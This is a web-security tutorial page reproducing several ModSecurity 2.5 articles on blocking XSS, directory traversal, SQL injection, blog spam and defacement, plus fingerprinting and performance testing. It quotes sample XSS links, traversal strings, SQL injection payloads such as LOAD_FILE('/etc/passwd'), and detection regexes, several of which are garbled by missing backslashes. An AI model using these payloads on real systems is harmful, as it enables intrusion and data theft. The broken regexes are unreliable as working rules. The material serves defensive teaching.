Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-blocking-common-attacks-using-modsecurity-25-part-2
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 2

Packt
01 Dec 2009
11 min read
Cross-site scripting Cross-site scripting attacks occur when user input is not properly sanitized and ends up in pages sent back to users. This makes it possible for an attacker to include malicious scripts in a page by providing them as input to the page. The scripts will be no different than scripts included in pages by the website creators, and will thus have all the privileges of an ordinary script within the page—such as the ability to read cookie data and session IDs. In this article we will look in more detail on how to prevent attacks. The name "cross-site scripting" is actually rather poorly chosen—the name stems from the first such vulnerability that was discovered, which involved a malicious website using HTML framesets to load an external site inside a frame. The malicious site could then manipulate the loaded external site in various ways—for example, read form data, modify the site, and basically perform any scripting action that a script within the site itself could perform. Thus cross-site scripting, or XSS, was the name given to this kind of attack. The attacks described as XSS attacks have since shifted from malicious frame injection (a problem that was quickly patched by web browser developers) to the class of attacks that we see today involving unsanitized user input. The actual vulnerability referred to today might be better described as a "malicious script injection attack", though that doesn't give it quite as flashy an acronym as XSS. (And in case you're curious why the acronym is XSS and not CSS, the simple explanation is that although CSS was used as short for cross-site scripting in the beginning, it was changed to XSS because so many people were confusing it with the acronym used for Cascading Style Sheets, which is also CSS.) Cross-site scripting attacks can lead not only to cookie and session data being stolen, but also to malware being downloaded and executed and injection of arbitrary content into web pages. Cross-site scripting attacks can generally be divided into two categories: Reflected attacksThis kind of attack exploits cases where the web application takes data provided by the user and includes it without sanitization in output pages. The attack is called "reflected" because an attacker causes a user to provide a malicious script to a server in a request that is then reflected back to the user in returned pages, causing the script to execute. Stored attacksIn this type of XSS attack, the attacker is able to include his malicious payload into data that is permanently stored on the server and will be included without any HTML entity encoding to subsequent visitors to a page. Examples include storing malicious scripts in forum posts or user presentation pages. This type of XSS attack has the potential to be more damaging since it can affect every user who views a certain page. Preventing XSS attacks The most important measure you can take to prevent XSS attacks is to make sure that all user-supplied data that is output in your web pages is properly sanitized. This means replacing potentially unsafe characters, such as angled brackets (< and >) with their corresponding HTML-entity encoded versions—in this case &lt; and &gt;. Here is a list of characters that you should encode when present in user-supplied data that will later be included in web pages: Character HTML-encoded version < &lt; > &gt; ( &#40; ) &#41; # &#35; & &amp; " &quot; ' &#39; In PHP, you can use the htmlentities() function to achieve this. When encoded, the string <script> will be converted into &lt;script&gt;. This latter version will be displayed as <script> in the web browser, without being interpreted as the start of a script by the browser. In general, users should not be allowed to input any HTML markup tags if it can be avoided. If you do allow markup such as <a href="..."> to be input by users in blog comments, forum posts, and similar places then you should be aware that simply filtering out the <script> tag is not enough, as this simple example shows: <a href="http://www.google.com" onMouseOver="javascript:alert('XSS Exploit!')">Innocent link</a> This link will execute the JavaScript code contained within the onMouseOver attribute whenever the user hovers his mouse pointer over the link. You can see why even if the web application replaced <script> tags with their HTML-encoded version, an XSS exploit would still be possible by simply using onMouseOver or any of the other related events available, such as onClick or onMouseDown. I want to stress that properly sanitizing user input as just described is the most important step you can take to prevent XSS exploits from occurring. That said, if you want to add an additional line of defense by creating ModSecurity rules, here are some common XSS script fragments and regular expressions for blocking them: Script fragment Regular expression <script <script eval( evals*( onMouseOver onmouseover onMouseOut onmouseout onMouseDown onmousedown onMouseMove onmousemove onClick onclick onDblClick ondblclick onFocus onfocus PDF XSS protection You may have seen the ModSecurity directive SecPdfProtect mentioned, and wondered what it does. This directive exists to protect users from a particular class of cross-site scripting attack that affects users running a vulnerable version of the Adobe Acrobat PDF reader. A little background is required in order to understand what SecPdfProtect does and why it is necessary. In 2007, Stefano Di Paola and Giorgio Fedon discovered a vulnerability in Adobe Acrobat that allows attackers to insert JavaScript into requests, which is then executed by Acrobat in the context of the site hosting the PDF file. Sound confusing? Hang on, it will become clearer in a moment. The vulnerability was quickly fixed by Adobe in version 7.0.9 of Acrobat. However, there are still many users out there running old versions of the reader, which is why preventing this sort of attack is still an ongoing concern. The basic attack works like this: An attacker entices the victim to click a link to a PDF file hosted on www.example.com. Nothing unusual so far, except for the fact that the link looks like this: http://www.example.com/document.pdf#x=javascript:alert('XSS'); Surprisingly, vulnerable versions of Adobe Acrobat will execute the JavaScript in the above link. It doesn't even matter what you place before the equal sign, gibberish= will work just as well as x= in triggering the exploit. Since the PDF file is hosted on the domain www.example.com, the JavaScript will run as if it was a legitimate piece of script within a page on that domain. This can lead to all of the standard cross-site scripting attacks that we have seen examples of before. This diagram shows the chain of events that allows this exploit to function: The vulnerability does not exist if a user downloads the PDF file and then opens it from his local hard drive. ModSecurity solves the problem of this vulnerability by issuing a redirect for all PDF files. The aim is to convert any URLs like the following: http://www.example.com/document.pdf#x=javascript:alert('XSS'); into a redirected URL that has its own hash character: http://www.example.com/document.pdf#protection This will block any attacks attempting to exploit this vulnerability. The only problem with this approach is that it will generate an endless loop of redirects, as ModSecurity has no way of knowing what is the first request for the PDF file, and what is a request that has already been redirected. ModSecurity therefore uses a one-time token to keep track of redirect requests. All redirected requests get a token included in the new request string. The redirect link now looks like this: http://www.example.com/document.pdf?PDFTOKEN=XXXXX#protection ModSecurity keeps track of these tokens so that it knows which links are valid and should lead to the PDF file being served. Even if a token is not valid, the PDF file will still be available to the user, he will just have to download it to the hard drive. These are the directives used to configure PDF XSS protection in ModSecurity: SecPdfProtect On SecPdfProtectMethod TokenRedirection SecPdfProtectSecret "SecretString" SecPdfProtectTimeout 10 SecPdfProtectTokenName "token" The above configures PDF XSS protection, and uses the secret string SecretString to generate the one-time tokens. The last directive, SecPdfProtectTokenName, can be used to change the name of the token argument (the default is PDFTOKEN). This can be useful if you want to hide the fact that you are running ModSecurity, but unless you are really paranoid it won't be necessary to change this. The SecPdfProtectMethod can also be set to ForcedDownload, which will force users to download the PDF files instead of viewing them in the browser. This can be an inconvenience to users, so you would probably not want to enable this unless circumstances warrant (for example, if a new PDF vulnerability of the same class is discovered in the future). HttpOnly cookies to prevent XSS attacks One mechanism to mitigate the impact of XSS vulnerabilities is the HttpOnly flag for cookies. This extension to the cookie protocol was proposed by Microsoft (see http://msdn.microsoft.com/en-us/library/ms533046.aspx for a description), and is currently supported by the following browsers: Internet Explorer (IE6 SP1 and later) Firefox (2.0.0.5 and later) Google Chrome (all versions) Safari (3.0 and later) Opera (version 9.50 and later) HttpOnly cookies work by adding the HttpOnly flag to cookies that are returned by the server, which instructs the web browser that the cookie should only be used when sending HTTP requests to the server and should not be made available to client-side scripts via for example the document.cookie property. While this doesn't completely solve the problem of XSS attacks, it does mitigate those attacks where the aim is to steal valuable information from the user's cookies, such as for example session IDs. A cookie header with the HttpOnly flag set looks like this: Set-Cookie: SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly HttpOnly cookies need to be supported on the server-side for the clients to be able to take advantage of the extra protection afforded by them. Some web development platforms currently support HttpOnly cookies through the use of the appropriate configuration option. For example, PHP 5.2.0 and later allow HttpOnly cookies to be enabled for a page by using the following ini_set() call: <?php ini_set("session.cookie_httponly", 1); ?> Tomcat (a Java Servlet and JSP server) version 6.0.19 and later supports HttpOnly cookies, and they can be enabled by modifying a context's configuration so that it includes the useHttpOnly option, like so: <Context> <Manager useHttpOnly="true" /> </Context> In case you are using a web platform that doesn't support HttpOnly cookies, it is actually possible to use ModSecurity to add the flag to outgoing cookies. We will see how to do this now. Session identifiers Assuming we want to add the HttpOnly flag to session identifier cookies, we need to know which cookies are associated with session identifiers. The following table lists the name of the session identifier cookie for some of the most common languages: Language Session identifier cookie name PHP PHPSESSID JSP JSESSIONID ASP ASPSESSIONID ASP.NET ASP.NET_SessionId The table shows us that a good regular expression to identify session IDs would be (sessionid|sessid), which can be shortened to sess(ion)?id. The web programming language you are using might use another name for the session cookie. In that case, you can always find out what it is by looking at the headers returned by the server: echo -e "GET / HTTP/1.1nHost:yourserver.comnn"|nc yourserver.com 80|head Look for a line similar to: Set-Cookie: JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/ This is the session cookie—in this case the name of it is JESSIONID, since the server is running Tomcat and the JSP web application language. The following rules are used to add the HttpOnly flag to session cookies: # # Add HttpOnly flag to session cookies # SecRule RESPONSE_HEADERS:Set-Cookie "!(?i:HttpOnly)" "phase:3,chain,pass" SecRule MATCHED_VAR "(?i:sess(ion)?id)" "setenv:session_ cookie=%{MATCHED_VAR}" Header set Set-Cookie "%{SESSION_COOKIE}e; HttpOnly" env=session_ cookie We are putting the rule chain in phase 3—RESPONSE_HEADERS, since we want to inspect the response headers for the presence of a Set-Cookie header. We are looking for those Set-Cookie headers that do not contain an HttpOnly flag. The (?i: ) parentheses are a regular expression construct known as a mode-modified span. This tells the regular expression engine to ignore the case of the HttpOnly string when attempting to match. Using the t:lowercase transform would have been more complicated, as we will be using the matched variable in the next rule, and we don't want the case of the variable modified when we set the environment variable.
Read more
  • 0
  • 0
  • 5086

article-image-blocking-common-attacks-using-modsecurity-25-part-1
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited: The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, that have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted. The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file. Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities. Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data. HTTP fingerprinting Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play. We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system. More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools: httprint One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD. httprecon This is a newer tool which was first released in 2007. It is still in active development. Runs on Windows. Let's first run httprecon against a standard Apache 2.2 server: And now let's run httprint against the same server and see what happens: As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server! You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/. Tip If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname. The fact that both tools are able to identify the server should come as no surprise as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software. How HTTP fingerprinting works There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones. Server banner The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner: # Change the server banner to MyServer 1.0ServerTokens FullSecServerSignature "MyServer 1.0" Response header The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges. HTTP protocol responses An other way to gain information on a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server. Issuing an HTTP DELETE request The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number will the server be using for the response page? Here is a DELETE request issued to our Apache server: $ nc bytelayer.com 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedDate: Mon, 27 Apr 2009 09:10:49 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Allow: GET,HEAD,POST,OPTIONS,TRACEContent-Length: 303Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method DELETE is not allowed for the URL /index.html.</p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> As we can see, the server returned a 405 - Method Not Allowed error. The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL/index.html. Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net: $ nc www.iis.net 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedAllow: GET, HEAD, OPTIONS, TRACEContent-Type: text/htmlServer: Microsoft-IIS/7.0Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35GMT; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Mon, 27 Apr 2009 09:22:34 GMTConnection: closeContent-Length: 1293<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html ><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>405 - HTTP verb used to access this page is not allowed.</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;}h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;}h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;fontfamily:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style>< /head><body><div id="header"><h1>Server Error</h1></div><div id="content"><div class="content-container"><fieldset> <h2>405 - HTTP verb used to access this page is not allowed.</h2> <h3>The page you are looking for cannot be displayed because aninvalid method (HTTP verb) was used to attempt access.</h3> </fieldset></div></div></body></html> The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0. (We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site we can be pretty sure that they are indeed running their own web server software.) The response generated from IIS carries the same HTTP error code, 405; however there are many subtle differences in the way the response is generated. Here are just a few: IIS uses spaces in between method names in the comma separated list for the Allow field, whereas Apache does not The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body Bad HTTP version numbers A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued: $ nc bytelayer.com 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestDate: Mon, 27 Apr 2009 09:36:10 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Content-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could notunderstand.<br /></p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request Error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand. Now let's see what IIS does: $ nc www.iis.net 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 27 Apr 2009 09:38:37 GMTConnection: closeContent-Length: 334<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=usascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML> We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol would also require this header to be sent, and the error message reflects this fact.
Read more
  • 0
  • 0
  • 4683

article-image-blocking-common-attacks-using-modsecurity-25-part-3
Packt
01 Dec 2009
12 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 3

Packt
01 Dec 2009
12 min read
Source code revelation Normally, requesting a file with a .php extension will cause mod_php to execute the PHP code contained within the file and then return the resulting web page to the user. If the web server is misconfigured (for example if mod_php is not loaded) then the .php file will be sent by the server without interpretation, and this can be a security problem. If the source code contains credentials used to connect to an SQL database then that opens up an avenue for attack, and of course the source code being available will allow a potential attacker to scrutinize the code for vulnerabilities. Preventing source code revelation is easy. With response body access on in ModSecurity, simply add a rule to detect the opening PHP tag: Prevent PHP source code from being disclosed SecRule RESPONSE_BODY "<?" "deny,msg:'PHP source code disclosure blocked'" Preventing Perl and JSP source code from being disclosed works in a similar manner: # Prevent Perl source code from being disclosed SecRule RESPONSE_BODY "#!/usr/bin/perl" "deny,msg:'Perl source code disclosure blocked'" # Prevent JSP source code from being disclosed SecRule RESPONSE_BODY "<%" "deny,msg:'JSP source code disclosure blocked'" Directory traversal attacks Normally, all web servers should be configured to reject attempts to access any document that is not under the web server's root directory. For example, if your web server root is /home/www, then attempting to retrieve /home/joan/.bashrc should not be possible since this file is not located under the /home/www web server root. The obvious attempt to access the /home/joan directory is, of course, easy for the web server to block, however there is a more subtle way to access this directory which still allows the path to start with /home/www, and that is to make use of the .. symbolic directory link which links to the parent directory in any given directory. Even though most web servers are hardened against this sort of attack, web applications that accept input from users may still not be checking it properly, potentially allowing users to get access to files they shouldn't be able to view via simple directory traversal attacks. This alone is reason to implement protection against this sort of attack using ModSecurity rules. Furthermore, keeping with the principle of Defense in Depth, having multiple protections against this vulnerability can be beneficial in case the web server should contain a flaw that allows this kind of attack in certain circumstances. There is more than one way to validly represent the .. link to the parent directory. URL encoding of .. yields % 2e% 2e, and adding the final slash at the end we end up with % 2e% 2e% 2f(please ignore the space). Here, then is a list of what needs to be blocked: ../ ..% 2f .% 2e/ %  2e%  2e% 2f % 2e% 2e/ % 2e./ Fortunately, we can use the ModSecurity transformation t:urlDecode. This function does all the URL decoding for us, and will allow us to ignore the percent-encoded values, and thus only one rule is needed to block these attacks: SecRule REQUEST_URI "../" "t:urlDecode,deny" Blog spam The rise of weblogs, or blogs, as a new way to present information, share thoughts, and keep an online journal has made way for a new phenomenon: blog comments designed to advertise a product or drive traffic to a website. Blog spam isn't a security problem per se, but it can be annoying and cost a lot of time when you have to manually remove spam comments (or delete them from the approval queue, if comments have to be approved before being posted on the blog). Blog spam can be mitigated by collecting a list of the most common spam phrases, and using the ability of ModSecurity to scan POST data. Any attempted blog comment that contains one of the offending phrases can then be blocked. From both a performance and maintainability perspective, using the @pmFromFile operator is the best choice when dealing with large word lists such as spam phrases. To create the list of phrases to be blocked, simply insert them into a text file, for example, /usr/local/spamlist.txt: viagra v1agra auto insurance rx medications cheap medications ... Then create ModSecurity rules to block those phrases when they are used in locations such as the page that creates new blog comments: # # Prevent blog spam by checking comment against known spam # phrases in file /usr/local/spamlist.txt # <Location /blog/comment.php> SecRule ARGS "@pmFromFile /usr/local/spamlist.txt" "t: lowercase,deny,msg:'Blog spam blocked'" </Location> Keep in mind that the spam list file can contain whole sentences—not just single words—so be sure to take advantage of that fact when creating the list of known spam phrases. SQL injection SQL injection attacks can occur if an attacker is able to supply data to a web application that is then used in unsanitized form in an SQL query. This can cause the SQL query to do completely different things than intended by the developers of the web application. Consider an SQL query like this: SELECT * FROM user WHERE username = '%s' AND password = '%s'; The flaw here is that if someone can provide a password that looks like ' OR '1'='1, then the query, with username and password inserted, will become: SELECT * FROM user WHERE username = 'anyuser' AND password = '' OR '1'='1'; This query will return all users in the results table, since the OR '1'='1' part at the end of the statement will make the entire statement true no matter what username and password is provided. Standard injection attempts Let's take a look at some of the most common ways SQL injection attacks are performed. Retrieving data from multiple tables with UNION An SQL UNION statement can be used to retrieve data from two separate tables. If there is one table named cooking_recipes and another table named user_credentials, then the following SQL statement will retrieve data from both tables: SELECT dish_name FROM recipe UNION SELECT username, password FROM user_credentials; It's easy to see how the UNION statement can allow an attacker to retrieve data from other tables in the database if he manages to sneak it into a query. A similar SQL statement is UNION ALL, which works almost the same way as UNION—the only difference is that UNION ALL will not eliminate any duplicate rows returned in the result. Multiple queries in one call If the SQL engine allows multiple statements in a single SQL query then seemingly harmless statements such as the following can present a problem: SELECT * FROM products WHERE id = %d; If an attacker is able to provide an ID parameter of 1; DROP TABLE products;, then the statement suddenly becomes: SELECT * FROM products WHERE id = 1; DROP TABLE products; When the SQL engine executes this, it will first perform the expected SELECT query, and then the DROP TABLE products statement, which will cause the products table to be deleted. Reading arbitrary files MySQL can be used to read data from arbitrary files on the system. This is done by using the LOAD_FILE() function: SELECT LOAD_FILE("/etc/passwd"); This command returns the contents of the file /etc/passwd. This works for any file to which the MySQL process has read access. Writing data to files MySQL also supports the command INTO OUTFILE which can be used to write data into files. This attack illustrates how dangerous it can be to include user-supplied data in SQL commands, since with the proper syntax, an SQL command can not only affect the database, but also the underlying file system. This simple example shows how to use MySQL to write the string some data into the file test.txt: mysql> SELECT "some data" INTO OUTFILE "test.txt"; Preventing SQL injection attacks There are three important steps you need to take to prevent SQL injection attacks: Use SQL prepared statements. Sanitize user data. Use ModSecurity to block SQL injection code supplied to web applications. These are in order of importance, so the most important consideration should always be to make sure that any code querying SQL databases that relies on user input should use prepared statements. A prepared statement looks as follows: SELECT * FROM books WHERE isbn = ? AND num_copies < ?; This allows the SQL engine to replace the question marks with the actual data. Since the SQL engine knows exactly what is data and what SQL syntax, this prevents SQL injection from taking place. The advantages of using prepared statements are twofold: They effectively prevent SQL injection. They speed up execution time, since the SQL engine can compile the statement once, and use the pre-compiled statement on all subsequent query invocations. So not only will using prepared statements make your code more secure—it will also make it quicker. The second step is to make sure that any user data used in SQL queries is sanitized. Any unsafe characters such as single quotes should be escaped. If you are using PHP, the function mysql_real_escape_string() will do this for you. Finally, let's take a look at strings that ModSecurity can help block to prevent SQL injection attacks. What to block The following table lists common SQL commands that you should consider blocking, together with a suggested regular expression for blocking. The regular expressions are in lowercase and therefore assume that the t:lowercase transformation function is used. SQL code Regular expression UNION SELECT unions+select UNION ALL SELECT unions+alls+select INTO OUTFILE intos+outfile DROP TABLE drops+table ALTER TABLE alters+table LOAD_FILE load_file SELECT * selects+* For example, a rule to detect attempts to write data into files using INTO OUTFILE looks as follows: SecRule ARGS "intos+outfile" "t:lowercase,deny,msg: 'SQL Injection'" The s+ regular expression syntax allows for detection of an arbitrary number of whitespace characters. This will detect evasion attempts such as INTO%20%20OUTFILE where multiple spaces are used between the SQL command words. Website defacement We've all seen the news stories: "Large Company X was yesterday hacked and their homepage was replaced with an obscene message". This sort of thing is an everyday occurrence on the Internet. After the company SCO initiated a lawsuit against Linux vendors citing copyright violations in the Linux source code, the SCO corporate website was hacked and an image was altered to read WE OWN ALL YOUR CODE—pay us all your money. The hack was subtle enough that the casual visitor to the SCO site would likely not be able to tell that this was not the official version of the homepage: The above image shows what the SCO homepage looked like after being defaced—quite subtle, don't you think? Preventing website defacement is important for a business for several reasons: Potential customers will turn away when they see the hacked site There will be an obvious loss of revenue if the site is used for any sort of e-commerce sales Bad publicity will tarnish the company's reputation Defacement of a site will of course depend on a vulnerability being successfully exploited. The measures we will look at here are aimed to detect that a defacement has taken place, so that the real site can be restored as quickly as possible. Detection of website defacement is usually done by looking for a specific token in the outgoing web pages. This token has been placed within the pages in advance specifically so that it may be used to detect defacement—if the token isn't there then the site has likely been defaced. This can be sufficient, but it can also allow the attacker to insert the same token into his defaced page, defeating the detection mechanism. Therefore, we will go one better and create a defacement detection technology that will be difficult for the hacker to get around. To create a dynamic token, we will be using the visitor's IP address. The reason we use the IP address instead of the hostname is that a reverse lookup may not always be possible, whereas the IP address will always be available. The following example code in JSP illustrates how the token is calculated and inserted into the page. <%@ page import="java.security.*" %> <% String tokenPlaintext = request.getRemoteAddr(); String tokenHashed = ""; String hexByte = ""; // Hash the IP address MessageDigest md5 = MessageDigest.getInstance("MD5"); md5.update(tokenPlaintext.getBytes()); byte[] digest = md5.digest(); for (int i = 0; i < digest.length; i++) { hexByte = Integer.toHexString(0xFF & digest[i]); if (hexByte.length() < 2) { hexByte = "0" + hexByte; } tokenHashed += hexByte; } // Write MD5 sum token to HTML document out.println(String.format("<span style='color: white'>%s</span>", tokenHashed)); %>   Assuming the background of the page is white, the <span style="color: white"> markup will ensure it is not visible to website viewers. Now for the ModSecurity rules to handle the defacement detection. We need to look at outgoing pages and make sure that they include the appropriate token. Since the token will be different for different users, we need to calculate the same MD5 sum token in our ModSecurity rule and make sure that this token is included in the output. If not, we block the page from being sent and sound the alert by sending an email message to the website administrator. # # Detect and block outgoing pages not containing our token # SecRule REMOTE_ADDR ".*" "phase:4,deny,chain,t:md5,t:hexEncode, exec:/usr/bin/emailadmin.sh" SecRule RESPONSE_BODY "!@contains %{MATCHED_VAR}" We are placing the rule in phase 4 since this is required when we want to inspect the response body. The exec action is used to send an email to the website administrator to let him know of the website defacement.
Read more
  • 0
  • 1
  • 9184
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-ways-improve-performance-your-server-modsecurity-25
Packt
30 Nov 2009
13 min read
Save for later

Ways to improve performance of your server in ModSecurity 2.5

Packt
30 Nov 2009
13 min read
A typical HTTP request To get a better picture of the possible delay incurred when using a web application firewall, it helps to understand the anatomy of a typical HTTP request, and what processing time a typical web page download will incur. This will help us compare any added ModSecurity processing time to the overall time for the entire request. When a user visits a web page, his browser first connects to the server and downloads the main resource requested by the user (for example, an .html file). It then parses the downloaded file to discover any additional files, such as images or scripts, that it must download to be able to render the page. Therefore, from the point of view of a web browser, the following sequence of events happens for each file: Connect to web server. Request required file. Wait for server to start serving file. Download file. Each of these steps adds latency, or delay, to the request. A typical download time for a web page is on the order of hundreds of milliseconds per file for a home cable/DSL user. This can be slower or faster, depending on the speed of the connection and the geographical distance between the client and server. If ModSecurity adds any delay to the page request, it will be to the server processing time, or in other words the time from when the client has connected to the server to when the last byte of content has been sent out to the client. Another aspect that needs to be kept in mind is that ModSecurity will increase the memory usage of Apache. In what is probably the most common Apache configuration, known as "prefork", Apache starts one new child process for each active connection to the server. This means that the number of Apache instances increases and decreases depending on the number of client connections to the server.As the total memory usage of Apache depends on the number of child processes running and the memory usage of each child process, we should look at the way ModSecurity affects the memory usage of Apache. A real-world performance test In this section we will run a performance test on a real web server running Apache 2.2.8 on a Fedora Linux server (kernel 2.6.25). The server has an Intel Xeon 2.33 GHz dual-core processor and 2 GB of RAM. We will start out benchmarking the server when it is running just Apache without having ModSecurity enabled. We will then run our tests with ModSecurity enabled but without any rules loaded. Finally, we will test ModSecurity with a ruleset loaded so that we can draw conclusions about how the performance is affected. The rules we will be using come supplied with ModSecurity and are called the "core ruleset". The core ruleset The ModSecurity core ruleset contains over 120 rules and is shipped with the default ModSecurity source distribution (it's contained in the rules sub-directory). This ruleset is designed to provide "out of the box" protection against some of the most common web attacks used today. Here are some of the things that the core ruleset protects against: Suspicious HTTP requests (for example, missing User-Agent or Accept headers) SQL injection Cross-Site Scripting (XSS) Remote code injection File disclosure We will examine these methods of attack, but for now, let's use the core ruleset and examine how enabling it impacts the performance of your web service. Installing the core ruleset To install the core ruleset, create a new sub-directory named modsec under your Apache conf directory (the location will vary depending on your distribution). Then copy all the .conf files from the rules sub-directory of the source distribution to the new modsec directory: mkdir /etc/httpd/conf/modseccp/home/download/modsecurity-apache/rules/modsecurity_crs_*.conf /etc/httpd/conf/modsec Finally, enter the following line in your httpd.conf file and restart Apache to make it read the new rule files: # Enable ModSecurity core rulesetInclude conf/modsecurity/*.conf Putting the core rules in a separate directory makes it easy to disable them—all you have to do is comment out the above Include line in httpd.conf, restart Apache, and the rules will be disabled. Making sure it works The core ruleset 